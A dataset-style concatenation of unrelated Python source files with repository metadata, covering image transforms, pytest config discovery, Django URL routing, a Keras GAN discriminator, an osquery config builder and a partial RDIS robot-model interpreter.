result = change_transform_origin(transform, (0.5 * width, 0.5 * height))
return result
class TransformParameters:
# Questo oggetto contiene i parametri che determinano come applicare una trasformazione ad una immagine
def __init__(
self,
fill_mode='nearest',
interpolation='linear',
cval=0,
data_format=None,
relative_translation=True,
):
self.fill_mode = fill_mode
self.cval = cval
self.interpolation = interpolation
self.relative_translation = relative_translation
if data_format is None:
data_format = keras.backend.image_data_format()
self.data_format = data_format
if data_format == 'channels_first':
self.channel_axis = 0
elif data_format == 'channels_last':
self.channel_axis = 2
else:
raise ValueError("Il valore di 'data_format' deve essere 'channels_first' o 'channels_last', mentre invece è '{}'".format(data_format))
def cvBorderMode(self):
if self.fill_mode == 'constant':
return cv2.BORDER_CONSTANT
if self.fill_mode == 'nearest':
return cv2.BORDER_REPLICATE
if self.fill_mode == 'reflect':
return cv2.BORDER_REFLECT_101
if self.fill_mode == 'wrap':
return cv2.BORDER_WRAP
def cvInterpolation(self):
if self.interpolation == 'nearest':
return cv2.INTER_NEAREST
if self.interpolation == 'linear':
return cv2.INTER_LINEAR
if self.interpolation == 'cubic':
return cv2.INTER_CUBIC
if self.interpolation == 'area':
return cv2.INTER_AREA
if self.interpolation == 'lanczos4':
return cv2.INTER_LANCZOS4
def apply_transform(matrix, image, params):
# Applica una trasformazione ad una immagine
if params.channel_axis != 2:
image = np.moveaxis(image, params.channel_axis, 2)
output = cv2.warpAffine(
image,
matrix[:2, :],
dsize=(image.shape[1], image.shape[0]),
flags=params.cvInterpolation(),
borderMode=params.cvBorderMode(),
borderValue=params.cval,
)
if params.channel_axis != 2:
output = np.moveaxis(output, 2, params.channel_axis)
return output
def resize_image(img, min_side=600, max_side=1024):
(rows, cols, _) = img.shape
smallest_side = min(rows, cols)
# calcola la scala in base alla dimensione minore dell'immagine
scale = min_side / smallest_side
# verifica che la dimensione maggiore dell'immagine non superi "max_side"
# si potrebbe verificare con immagini dall'alto aspect ratio
largest_side = max(rows, cols)
if largest_side * scale > max_side:
scale = max_side / largest_side
# ridimensione l'immagine usando la scala calcolata
img = cv2.resize(img, None, fx=scale, fy=scale)
return img, scale
|
[
"ccasadei@maggioli.it"
] |
ccasadei@maggioli.it
|
a68e884048a4a15846273ef1809df5ae52cf12ee
|
f4b0fad9a8a6937021c526f2560d47dbd0fccdb0
|
/venv/lib/python3.6/site-packages/_pytest/config/findpaths.py
|
20a8d3dadb18eab7ce7007f86563d5c80371314e
|
[
"BSD-3-Clause"
] |
permissive
|
RALEx147/FilmColorSearch
|
a54917fb7353c03a7a51277a8cd2c416270c4dcb
|
88b981655c4dd708ad3ad40257356791dcddf5f0
|
refs/heads/master
| 2021-01-04T23:07:01.820998
| 2020-09-08T18:29:52
| 2020-09-08T18:29:52
| 240,788,528
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,803
|
py
|
import os
from typing import Any
from typing import Iterable
from typing import List
from typing import Optional
from typing import Tuple
import py
from .exceptions import UsageError
from _pytest.compat import TYPE_CHECKING
from _pytest.outcomes import fail
if TYPE_CHECKING:
from . import Config # noqa: F401
def exists(path, ignore=EnvironmentError):
try:
return path.check()
except ignore:
return False
def getcfg(args, config=None):
"""
searcher the list of arguments for a valid ini-file for pytest,
and return a tuple of (rootdir, inifile, cfg-dict).
note: config is optional and used only to issue warnings explicitly (#2891).
"""
inibasenames = ["pytest.ini", "tox.ini", "setup.cfg"]
args = [x for x in args if not str(x).startswith("-")]
if not args:
args = [py.path.local()]
for arg in args:
arg = py.path.local(arg)
for base in arg.parts(reverse=True):
for inibasename in inibasenames:
p = base.join(inibasename)
if exists(p):
try:
iniconfig = py.iniconfig.IniConfig(p)
except py.iniconfig.ParseError as exc:
raise UsageError(str(exc))
if (
inibasename == "setup.cfg"
and "tool:pytest" in iniconfig.sections
):
return base, p, iniconfig["tool:pytest"]
elif "pytest" in iniconfig.sections:
if inibasename == "setup.cfg" and config is not None:
fail(
CFG_PYTEST_SECTION.format(filename=inibasename),
pytrace=False,
)
return base, p, iniconfig["pytest"]
elif inibasename == "pytest.ini":
# allowed to be empty
return base, p, {}
return None, None, None
def get_common_ancestor(paths: Iterable[py.path.local]) -> py.path.local:
common_ancestor = None
for path in paths:
if not path.exists():
continue
if common_ancestor is None:
common_ancestor = path
else:
if path.relto(common_ancestor) or path == common_ancestor:
continue
elif common_ancestor.relto(path):
common_ancestor = path
else:
shared = path.common(common_ancestor)
if shared is not None:
common_ancestor = shared
if common_ancestor is None:
common_ancestor = py.path.local()
elif common_ancestor.isfile():
common_ancestor = common_ancestor.dirpath()
return common_ancestor
def get_dirs_from_args(args):
def is_option(x):
return str(x).startswith("-")
def get_file_part_from_node_id(x):
return str(x).split("::")[0]
def get_dir_from_path(path):
if path.isdir():
return path
return py.path.local(path.dirname)
# These look like paths but may not exist
possible_paths = (
py.path.local(get_file_part_from_node_id(arg))
for arg in args
if not is_option(arg)
)
return [get_dir_from_path(path) for path in possible_paths if path.exists()]
CFG_PYTEST_SECTION = "[pytest] section in {filename} files is no longer supported, change to [tool:pytest] instead."
def determine_setup(
inifile: Optional[str],
args: List[str],
rootdir_cmd_arg: Optional[str] = None,
config: Optional["Config"] = None,
) -> Tuple[py.path.local, Optional[str], Any]:
dirs = get_dirs_from_args(args)
if inifile:
iniconfig = py.iniconfig.IniConfig(inifile)
is_cfg_file = str(inifile).endswith(".cfg")
sections = ["tool:pytest", "pytest"] if is_cfg_file else ["pytest"]
for section in sections:
try:
inicfg = iniconfig[
section
] # type: Optional[py.iniconfig._SectionWrapper]
if is_cfg_file and section == "pytest" and config is not None:
fail(
CFG_PYTEST_SECTION.format(filename=str(inifile)), pytrace=False
)
break
except KeyError:
inicfg = None
if rootdir_cmd_arg is None:
rootdir = get_common_ancestor(dirs)
else:
ancestor = get_common_ancestor(dirs)
rootdir, inifile, inicfg = getcfg([ancestor], config=config)
if rootdir is None and rootdir_cmd_arg is None:
for possible_rootdir in ancestor.parts(reverse=True):
if possible_rootdir.join("setup.py").exists():
rootdir = possible_rootdir
break
else:
if dirs != [ancestor]:
rootdir, inifile, inicfg = getcfg(dirs, config=config)
if rootdir is None:
if config is not None:
cwd = config.invocation_dir
else:
cwd = py.path.local()
rootdir = get_common_ancestor([cwd, ancestor])
is_fs_root = os.path.splitdrive(str(rootdir))[1] == "/"
if is_fs_root:
rootdir = ancestor
if rootdir_cmd_arg:
rootdir = py.path.local(os.path.expandvars(rootdir_cmd_arg))
if not rootdir.isdir():
raise UsageError(
"Directory '{}' not found. Check your '--rootdir' option.".format(
rootdir
)
)
return rootdir, inifile, inicfg or {}
|
[
"mr7.jacky@gmail.com"
] |
mr7.jacky@gmail.com
|
43dec2a87170199a10d099ada95cfdbd0ffcd33a
|
438728da6fdfc218fe84c84f412400c1f619ce03
|
/lab7/util/neural-network-template-writer.py
|
21e2294e3df34932ce68d9abd24a6494dc4db4bd
|
[] |
no_license
|
smaft/nenr-lab
|
3581032825e0244efd1a9475e075315b48b77569
|
db34502aed9f89c90848b948abfc183aa825ee16
|
refs/heads/master
| 2022-06-28T02:07:19.183942
| 2020-01-16T22:55:37
| 2020-01-21T22:12:53
| 263,274,169
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 776
|
py
|
import sys
def main():
placeholders="w.11, s.11, w.12, s.12, w.21, s.21, w.22, s.22, w.31, s.31, w.32, s.32, w.41, s.41, w.42, s.42, w.51, s.51, w.52, s.52, w.61, s.61, w.62, s.62, w.71, s.71, w.72, s.72, w.81, s.81, w.82, s.82, a.w0, w.a1, w.a2, w.a3, w.a4, w.a5, w.a6, w.a7, w.a8, b.w0, w.b1, w.b2, w.b3, w.b4, w.b5, w.b6, w.b7, w.b8, c.w0, w.c1, w.c2, w.c3, w.c4, w.c5, w.c6, w.c7, w.c8".split(", ")
values = sys.argv[1].split(", ")
with open("neural-network-template.svg", "rt") as f_in:
with open("neural-network-written.svg", "wt") as f_out:
for line in f_in:
for p, v in zip(placeholders, values):
line = line.replace(p, v)
f_out.write(line)
if __name__ == '__main__':
main()
|
[
"mate.gasparini@fer.hr"
] |
mate.gasparini@fer.hr
|
b19940bec3074954ad59d065ad82dc93a3accefd
|
da5e76df4f0b172c30d2e817cdcf1bbb277890af
|
/Hotels/Hotels/urls.py
|
0fa8b9cb857d4e3ee30f2a8c7bc8da11991d2a06
|
[] |
no_license
|
twizy/Hotels
|
a58e3daefd3164ec35dc5b1c6d8b2a477a3e9915
|
e03543677fffb1f50a7e40f20e9098ded9127372
|
refs/heads/main
| 2023-02-15T04:39:42.384340
| 2021-01-19T10:18:43
| 2021-01-19T10:18:43
| 328,665,364
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
"""Hotels URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('Base.urls')),
# Rest Api Urls
path('api/', include('Base.urls')),
path('api/hotel/', include('HotelApp.Api.urls')),
]
+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"twizalain@gmail.com"
] |
twizalain@gmail.com
|
813c90c79d872d92cc71b7bb99d20320f4869c7d
|
28247c87bf546edcfd2763cd303a97ea82853bcb
|
/clashowords/wsgi.py
|
06db7a3c737d079673d485c165258959eae1f968
|
[] |
no_license
|
bibinhashley/ClashO-Words-Blog
|
ec61617ae58afe2ed95bed1a6c74401a68373f27
|
219b0f2244b3670306a9e6a4164fdf937a45eebd
|
refs/heads/master
| 2023-06-27T20:30:27.599589
| 2021-08-02T09:02:15
| 2021-08-02T09:02:15
| 296,549,817
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
"""
WSGI config for clashowords project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'clashowords.settings')
application = get_wsgi_application()
|
[
"bibinhashley@gmail.com"
] |
bibinhashley@gmail.com
|
72d1eb004c32759f15586960fc6cca1ed236a1e3
|
c97e43eca6a0ba9e4492da4d43cfc973dce6ac38
|
/GAN_model/D_gan.py
|
063d92d27364d289286949c806c35cab9739212d
|
[] |
no_license
|
Hutianzhong/SR-GAN
|
2f74676b4bd14d852aeb27b54e7e5b53e90b9bb1
|
1c719456571dbd7daf6cf86d5c1a6afc20c65ed5
|
refs/heads/master
| 2020-07-06T18:19:58.734672
| 2019-08-19T05:21:37
| 2019-08-19T05:21:37
| 203,102,102
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 586
|
py
|
from __future__ import print_function, division
from keras.layers import Input, Dense, Flatten
from keras.layers.advanced_activations import LeakyReLU
from keras.models import Sequential, Model
def build_D(hr_shape=(128, 128, 1)):
model = Sequential()
model.add(Flatten(input_shape=hr_shape))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(Dense(256))
model.add(LeakyReLU(alpha=0.2))
model.add(Dense(1, activation='sigmoid'))
model.summary()
img = Input(shape=hr_shape)
validity = model(img)
return Model(img, validity)
|
[
"noreply@github.com"
] |
Hutianzhong.noreply@github.com
|
a525ebf6be93760a40a846924b98bb880a8ae54f
|
975a345d2795198be60137c1a9bf94e429e997bb
|
/nte/data/real/gun_point/GunPointDataset.py
|
0b91f91eead2d9ffef2df699270edb837cd63d75
|
[
"MIT"
] |
permissive
|
kingspp/timeseries-explain
|
ff36a0d22f11b796dab40e7cd3042ada2fa366df
|
bb2e54772d36e0ab0753075f6ce060cdeb8c2e65
|
refs/heads/main
| 2023-05-23T12:11:06.372789
| 2022-08-04T03:45:07
| 2022-08-04T03:45:07
| 394,703,072
| 8
| 2
|
MIT
| 2021-09-26T20:00:41
| 2021-08-10T15:51:07
|
Python
|
UTF-8
|
Python
| false
| false
| 843
|
py
|
from nte.data.dataset import Dataset
from nte import NTE_MODULE_PATH
import pandas as pd
import os
class GunPointDataset(Dataset):
def __init__(self):
super().__init__(
name='gun_point',
meta_file_path=os.path.join(NTE_MODULE_PATH, 'data', 'real', 'gun_point', 'meta.json'))
def load_train_data(self):
df = pd.read_csv(os.path.join(NTE_MODULE_PATH, 'data', 'real', 'gun_point', 'train.csv'), header=None)
train_data = df[list(range(150))].values
train_label = df[150].values
return train_data, train_label
def load_test_data(self):
df = pd.read_csv(os.path.join(NTE_MODULE_PATH, 'data', 'real', 'gun_point', 'test.csv'), header=None)
test_data = df[list(range(150))].values
test_label = df[150].values
return test_data, test_label
|
[
"rdoddaiah@wpi.edu"
] |
rdoddaiah@wpi.edu
|
89732d3f509abfffc2a076d87fd4d409158596df
|
20406d142d31d4716d720cd876adef60092999eb
|
/publishconf.py
|
e10394cf6d0bc1bff59a9bc64bbde8875284bd8c
|
[] |
no_license
|
exhuma/mamerwiselen.lu
|
5cdbd0f888668c5068d0226ac68c3e6668b3d482
|
6fdcba10685258f5ec1c1711dd0fdd85c3f12900
|
refs/heads/master
| 2021-01-15T15:48:33.039233
| 2016-09-27T18:25:16
| 2016-09-27T18:25:16
| 42,190,065
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 549
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import * # NOQA
# This file is only used if you use `make publish` or
# explicitly specify it as your config file. You only need to specify values
# that are *different* on the production host.
SITEURL = 'http://www.mamerwiselen.lu'
RELATIVE_URLS = False
FEED_ALL_ATOM = 'feeds/all.atom.xml'
CATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'
FEED_DOMAIN_NAME = SITEURL
DELETE_OUTPUT_DIRECTORY = True
|
[
"michel@albert.lu"
] |
michel@albert.lu
|
e4c79f2b082684bf5aad943b274af43ef50c6488
|
198471d7a556acfe2158fff8216887f0d3ef92a1
|
/zentral/contrib/osquery/__init__.py
|
486737625236825b325218db47ff68c2a7fb9dd7
|
[
"Apache-2.0"
] |
permissive
|
luisgiraldo/zentral
|
30fcb8ba1d44f634cd9f3280e634d6df6a367064
|
6fdb1ea322e244f35c6b9e1c0c5bf94c68c0077f
|
refs/heads/master
| 2021-01-15T16:14:52.912027
| 2015-11-15T23:00:21
| 2015-11-15T23:00:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
from zentral.conf import settings, probes as all_probes
from zentral.core.exceptions import ImproperlyConfigured
# Enroll_secret structure : EnrollSecretSecret$Key$Val
# EnrollSecretSecret to test if it is a good request.
# Key / Val to try to link with the machine.
# If no machine found, not a problem.
# Enroll_secret example : BLABLA$SERIAL$AZLKJZAENEAZLKJ13098
def get_enroll_secret_secret(settings):
try:
return settings['apps']['zentral.contrib.osquery']['enroll_secret_secret']
except KeyError:
raise ImproperlyConfigured("Missing attribute 'enroll_secret_secret' in osquery app settings")
enroll_secret_secret = get_enroll_secret_secret(settings)
# The osquery conf for the connected daemons.
def build_osquery_conf(all_probes):
schedule = {}
file_paths = {}
probes = []
for probe_name, probe_d in all_probes.items():
osquery_d = probe_d.get('osquery', None)
if not osquery_d:
continue
probes.append((probe_name, probe_d))
for idx, osquery_query in enumerate(osquery_d.get('schedule', [])):
osquery_query_key = '%s_%d' % (probe_name, idx)
osquery_query = osquery_query.copy()
osquery_query.pop('key', None)
schedule[osquery_query_key] = osquery_query
for category, paths in osquery_d.get('file_paths', {}).items():
if category in file_paths:
raise ImproperlyConfigured('File path category %s not unique', category)
file_paths[category] = paths
osquery_conf = {'schedule': schedule,
'file_paths': file_paths}
probes.sort()
return osquery_conf, probes
osquery_conf, probes = build_osquery_conf(all_probes)
|
[
"eric.falconnier@112hz.com"
] |
eric.falconnier@112hz.com
|
75652bcd97100b8281c99c6eea4946c8d1d97d74
|
59254f1c203bd7ebd3a5d85d5ec31959c1e90182
|
/rdis/py/rdis.py
|
02a80b9d0bf21b20bbb2b3e2a4f6ef4c58b4b29a
|
[] |
no_license
|
monicadelaine/preop_create
|
c9c687012a23d99d200d4396237ba69862a285fc
|
34dbe0bb8d96d6adcb2c79ac33474007044b65dd
|
refs/heads/master
| 2020-04-11T04:23:20.150444
| 2013-02-22T22:02:51
| 2013-02-22T22:02:51
| 68,144,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25,569
|
py
|
#!/usr/bin/env python
"""
An interpreter for RDIS models and quick-n-dirty parser for the JSON concrete
syntax.
This contains several methods which are useful to other applications which are
associated somehow with RDIS and need to emulate some of its behavior.
Usage:
import rdis
model = rdis.load( "/path/to/my/model.rdis.json" )
model.startup()
while <stuff-to-do>:
model.tick()
if <some-event>:
model.callDomainInterface("interface-name", ["arg1", "arg2"])
model.terminate()
"""
import struct ## Used to pack bytes to send over the connection
import re ## Used for models which reply with ASCII-encoded data.
import sys ## Used for printing error messages.
import json ## Used to parse RDIS textual syntax.
import time ## Used for scheduling.
import random ## Used for dummy methods.
import string ## Used for checking printable characters.
import serial ## Used for serial port connections.
## Dictionary which maps RDIS types to Python types.
_gTypeMap = {
'int': 'int',
'float': 'float',
'string': 'str'
}
## Dictionary which maps RDIS types to their equivalent
## default values in Python.
_gDefaultValueMap = {
'int': 0,
'float': 0.0,
'string': ''
}
def mapDefaultValue(typeName):
"""
Maps an RDIS type name to Python default value.
Raises TypeError if typeName is not a valid RDIS type.
"""
global _gDefaultValueMap
mapType(typeName)
return _gDefaultValueMap[typeName]
def mapType(typeName):
"""
Maps an RDIS type to a Python type.
Raises TypeError if typeName is not a valid RDIS type.
"""
global _gTypeMap
if typeName not in _gTypeMap:
raise TypeError("Unknown RDIS type: " + str(typeName))
return _gTypeMap[typeName]
def createEnvironment(parameterNames, values):
"""
Given two parallel lists, one of names and one of values, create a
dictionary with the corresponding name/value pairs.
"""
env = dict()
i = 0
for parameter in parameterNames:
env[parameter] = values[i]
i += 1
return env
def deleteAdditions(before, after):
"""
Deletes any key which is in after, but is not in before.
"""
for key in after.viewkeys() - before.viewkeys():
del after[key]
def safeEval(expression, env):
"""
If expression is not a string, it returns expression.
Otherwise, if the first and last characters of the string
are '<' and '>', it chops them off and evaluates the resulting
expression under the provided environment.
"""
if not isinstance(expression, basestring) or len(expression) == 0:
return expression
returnValue = expression
oldEnv = dict(env)
if expression[0] == '<' and expression[-1] == '>':
returnValue = eval( expression[1:-1], env )
## Subtract off any keys added by eval
deleteAdditions(oldEnv, env)
return returnValue
def safeEvalAll(expressions, env):
"""
Evaluates each expression contained in expression and returns the list.
"""
return [safeEval(k,env) for k in expressions]
def safeExecs(stmts, globalEnv=None):
"""
Calls safeExec on a sequence of statements.
"""
oldGlobals = dict(globalEnv)
for stmt in stmts:
exec(stmt, globalEnv)
deleteAdditions(oldGlobals, globalEnv)
def safeType( value ):
"""
Gets a string representation of value's type.
Safe for objects and primitive types.
"""
varType = type(value).__name__
if varType == "instance":
return value.__class__.__name__
return varType
def printBytes(byteSequence):
"""
Prints a byte sequence to stdout.
If a character is printable, it will print the ASCII representation of that
byte as well. Otherwise, it only prints the hexadecimal represenation.
"""
for b in byteSequence:
if b in string.printable: print hex(ord(b)), b
else: print hex(ord(b))
def load(rdisFile):
"""
Builds RDIS model from its textual description.
@raises RDISExcption if the model description is invalid.
"""
fp = open(rdisFile)
ctx = json.load(fp)
fp.close()
try:
return RDIS(contextObject=ctx)
except KeyError as e:
raise RDISException("Invalid RDIS description given: " + str(e))
class RDISException(Exception):
"""
Class for RDIS-related exceptions, generally problems with the model itself.
This will be implemented more fully one day.
"""
pass
class RDIS:
"""
The public class for RDIS models.
Generally this should be constructed by calling rdis.load(), though public
methods exist for incrementally building a model by hand. 4 in 5 computer
scientists agree that this is generally a bad thing to do though.
"""
def __init__(self, contextObject=None):
"""
Makes an empty RDIS object.
"""
self._primitives = dict()
self._connections = dict()
self._interfaces = dict()
self._stateVariables = dict()
self._domainInterfaces = dict()
self._domainOutputs = dict()
self._callback = None
self._name = None
self._author = None
if contextObject != None:
self._fromContext(contextObject)
def setCallback(self, callback):
"""
Sets the callback to use when a domain output is triggered.
"""
self._callback = callback
def callDomainInterface(self, name, env):
"""
Calls a domain interface by its name.
The dictionary "env" corresponds to the parameters that the domain
interface takes.
"""
domainInterface = self._getDomainInterface(name)
if domainInterface == None:
sys.stderr.write("'{}': called nonexistant domain interface\n".format(
name
)
)
return
domainInterface.call(env)
def startup(self, **kwargs):
"""
Performs initialization tasks for the model.
This should be called after the model is constructed, but before any
real work is done as it initializes the connection to the robot and things
like that.
"""
for conn in self._connections.values():
apply(conn.startup, [], kwargs)
def terminate(self):
"""
Performs termination tasks for the model.
This should be called when all work is done for the model and it is not
needed anymore. This will do things such as putting the robot into a safe
state and releasing any resource locks.
"""
for conn in self._connections.values():
conn.terminate()
def tick(self):
"""
Notifies the model that a single cycle for the main thread of execution
should be performed.
This does not necessarily correspond to the tick rate of the connection,
but this should be called at a frequency faster than that of any component
in the model.
TODO: Actually there is no scheduling in the model right now. This should
be done real soon.
"""
for conn in self._connections.values():
conn.tick()
def setName(self, name):
"""
Sets the (robot) name of the model.
"""
self._name = name
def getName(self):
"""
Gets the (robot) name of the model.
"""
return self._name
def getAuthor(self):
"""
Gets the author of the model.
"""
return self._author
def getConnection(self, name):
"""
Gets a connection by its name.
"""
return self._connections[name]
def addInterface(self, name, **kwargs):
"""
Adds a local interface to the model.
"""
return apply(self._addElement, [name, self._interfaces, Interface], kwargs)
def addPrimitive(self, name, **kwargs):
"""
Adds a primitive tot he model.
"""
return apply(self._addElement, [name, self._primitives, Primitive], kwargs)
def addSerialConnection(self, name, **kwargs):
"""
Adds a serial connection to the model.
"""
return apply(self._addElement, [name, self._connections, SerialConnection],
kwargs)
def addStateVar(self, name, **kwargs):
"""
Adds a state variable to the model.
"""
return apply(self._addElement, [name, self._stateVariables, StateVar],
kwargs)
def addDomainInterface(self, name, **kwargs):
"""
Adds a domain interface to the model.
"""
return apply(self._addElement, [name, self._domainInterfaces,
DomainInterface], kwargs)
def addDomainOutput(self, name, **kwargs):
"""
Adds a domain output to the model.
"""
return apply(self._addElement, [name, self._domainOutputs,
DomainOutput], kwargs)
def _receiveMessage(self, who, msg):
"""
Receives a messages from one of the lower-level components to send to the
callback.
"""
if self._callback == None:
sys.stderr.write("Received message but no callback assigned!\n")
return
self._callback({'name': who.getName(), 'contents': msg})
def _addElement(self, name, store, classObj, **kwargs):
"""
Generalized method for adding a model component.
"""
kwargs["name"] = name
kwargs["parent"] = self
store[name] = apply(classObj, [], kwargs)
def getStateVarValue(self, name):
"""
Gets the (Python) value for a state variable.
"""
return self._stateVariables[name].getValue()
def _getDomainInterface(self, name):
"""
Gets a domain interface by its name.
"""
return self._domainInterfaces.get(name)
def _getInterface(self, name):
"""
Gets a local interface by its name.
"""
return self._interfaces.get(name)
def _getPrimitive(self, name):
"""
Gets a primitive by its name.
"""
return self._primitives.get(name)
def _getDomainOutput(self, name):
"""
Gets a domain output by its name.
"""
return self._domainOutputs.get(name)
def _callDomainOutput(self, name):
"""
Calls a domain output.
"""
do = self._getDomainOutput(name)
if do == None:
sys.stderr.write("'{}': nonexistent domain output\n".format(name))
return
do.call()
def _callPrimitive(self, name, posArgs):
"""
Calls a primitive with given positional arguments.
"""
p = self._getPrimitive(name)
if p == None:
sys.stderr.write("'{}': called nonexistent primitive\n".format(name))
return
elif p.parameterCount() != len(posArgs):
sys.stderr.write(
"Arg mismatch for primitive '{}'. Got {}, expected {}\n".format(
name, len(posArgs), p.parameterCount()
)
)
return
p.call(posArgs)
def _callInterface(self, name, posArgs):
"""
Calls an interface (with provided name) with given positional arguments.
"""
i = self._getInterface(name)
if i == None:
sys.stderr.write("'{}': called nonexistent local interface\n".format(
name
)
)
return
i.call(posArgs)
def _buildStateVarEnvironment(self):
"""
Builds a dictionary containing the names and values of the state
variables.
"""
env = dict()
for (name, stateVar) in self._stateVariables.items():
env[name] = stateVar.getValue()
return env
def _updateStateVarsFromEnvironment(self, env):
"""
Updates state variable values who share names with the keys of "env".
"""
for (name, value) in env.items():
stateVar = self._stateVariables[name]
stateVar.setValue(value)
def _fromContext(self, ctx):
"""
Builds RDIS model from the given context object.
"""
for key in ctx.keys():
if key == "domainInterfaces":
self._loadDomainInterfaces(ctx[key])
elif key == "interfaces":
self._loadInterfaces(ctx[key])
elif key == 'primitives':
self._loadPrimitives(ctx[key])
elif key == 'connections':
self._loadConnections(ctx[key])
elif key == 'domainOutputs':
self._loadDomainOutputs(ctx[key])
elif key == 'stateVariables':
self._loadStateVar(ctx[key])
elif key == 'author':
self._author = ctx[key]
elif key == 'name':
self._name = ctx[key]
else:
sys.stderr.write("Unknown element type: {}\n".format(key))
def _loadStateVar(self, varList):
"""
Loads state variables from the context object representation.
"""
for var in varList:
apply(self.addStateVar,
[var['name']], {
'type': var['type'],
'value': var['value']
}
)
def _loadDomainOutputs(self, doList):
"""
Loads domain outputs from the context object representation.
"""
for do in doList:
apply(self.addDomainOutput,
[do['name']], {
'returns': do['returns']
}
)
def _loadDomainInterfaces(self, diList):
"""
Loads domain interfaces from the context object representation.
"""
for di in diList:
apply(self.addDomainInterface,
[di["name"]], {
'parameters':di["parameters"],
'localInterface':di["calls"]["name"],
'interfaceArguments':di["calls"]["arguments"]
}
)
def _loadInterfaces(self, interfaceList):
"""
Loads local interfaces from the context object representation.
"""
for interface in interfaceList:
apply(self.addInterface,
[interface['name']], {
'type': interface['type'],
'parameters': interface.get('parameters'),
'triggers': interface.get('triggers')
}
)
i = self._getInterface(interface['name'])
for pc in interface['primitiveCalls']:
i.addPrimitiveCall(
pc['name'],
pc['arguments'],
pc['delay'],
pc['priority']
)
def _loadPrimitives(self, primitiveList):
"""
Loads primitives from the context object representation.
"""
for p in primitiveList:
apply(self.addPrimitive,
[p['name']], {
'connection': p['connection'],
'parameters': p.get('parameters', []),
'formatArgs': p.get('formatArgs', []),
'postActions': p.get('postActions', []),
'format': p.get('format'),
'regex': p.get('regex'),
'pack': p.get('pack'),
'unpack': p.get('unpack')
}
)
def _loadConnections(self, connections):
"""
Loads connections from the context object representation.
"""
self._loadSerialConnections(connections.get('spp'))
def _loadSerialConnections(self, connectionList):
"""
Loads serial connections from the context object representation.
"""
if connectionList == None: return
for c in connectionList:
apply(self.addSerialConnection,
[c['name']], {
'baud': c['baud'],
'singleThreading': c.get('singleThreading'),
})
conn = self.getConnection(c['name'])
k = c.get('keepalive')
t = c.get('terminate')
s = c.get('startup')
if k: apply(conn.setKeepalive, [], k)
if t: apply(conn.setTerminate, [], t)
if s: apply(conn.setStartup, [], s)
class StateVar:
"""
A basic unit of memory for the robot model.
Only Primitives can manipulate state variables and they generally reflect a
value read from the sensor, or some sort of constant about the robot.
"""
def __init__(self, name=None, value=None, type=None, parent=None):
"""
Constructs a state variable.
"""
if value == None:
value = mapDefaultValue(type)
self._name = name
self._parent = parent
self._setType(type)
self.setValue(safeEval(value,dict()))
def getValue(self):
"""
Gets the value of the state variable.
"""
return self._value
def _getDefaultValue(self):
"""
Gets the default value for this state variable.
"""
return mapDefaultValue(self._type)
def setValue(self,value):
"""
Sets the value of the state variable.
"""
if value == None or value == "":
value = self._getDefaultValue()
self._assertType(value)
self._value = value
def _assertType(self, value):
"""
Asserts value is a valid type for this state variable.
@raises TypeError if the assertion failed.
"""
nameType = self._getPythonType()
valType = safeType(value)
if not isinstance(value, eval(nameType)):
raise TypeError(
"Attempt to set {} ({}) to value {} ({}).".format(self._name, nameType,
repr(value), valType)
)
def _getPythonType(self):
"""
Gets the equivalent Python type for this state variable.
"""
return mapType(self._type)
def _setType(self, newType):
"""
Changes this StateVar's RDIS type.
"""
mapType(newType) ## Asserts that it is a valid RDIS type.
self._type = newType
class Primitive:
def __init__(self, parent=None, pack=None, unpack=None, parameters=[],
regex=None, format=None, name=None, connection=None, formatArgs=[],
postActions=[]):
"""
Constructs a Primitive.
"""
self._parent = parent
self._format = format
self._name = name
self._pack = pack
self._unpack = unpack
self._regex = regex
self._connection = connection
self._parameters = parameters
self._formatArgs = formatArgs
self._postActions = postActions
def call(self, arguments=[]):
"""
Calls a primitive with the provided positional arguments.
"""
env = createEnvironment(self._parameters, arguments)
## Evaluate all the args we send out on the format string.
values = [safeEval(k,env) for k in self._formatArgs]
## Write the information on the connection and read back.
connection = self._getConnection()
connection.write( self._doPack(values) )
out = self._doUnpack( connection )
## Build environments for postActions and execute them.
envs = self._buildPostActionEnv(env, out)
safeExecs(self._postActions, envs[1])
## Delete local variables that we added.
deleteAdditions(envs[0], envs[1])
## Updates stateVar from the global environment.
self._parent._updateStateVarsFromEnvironment(envs[1])
def parameterCount(self):
"""
Returns the number of parameters this Primitive accepts.
"""
return len(self._parameters)
def _buildPostActionEnv(self, parameters, out):
"""
Builds environment for post actions.
"""
globalEnv = self._parent._buildStateVarEnvironment()
globalCopy = dict(globalEnv)
globalCopy.update(parameters)
globalCopy["__out__"] = out
return (globalEnv, globalCopy)
def _getConnection(self):
"""
Gets connection associated with this Primitive.
"""
return self._parent.getConnection(self._connection)
def _doPack(self, values):
"""
Decides whether or not we need to ASCII-encode or byte-pack the values we
are writing to the robot.
"""
if self._format != None:
return bytes(apply(self._format.format, values))
else:
tmp = [str(self._pack)]
tmp.extend(values)
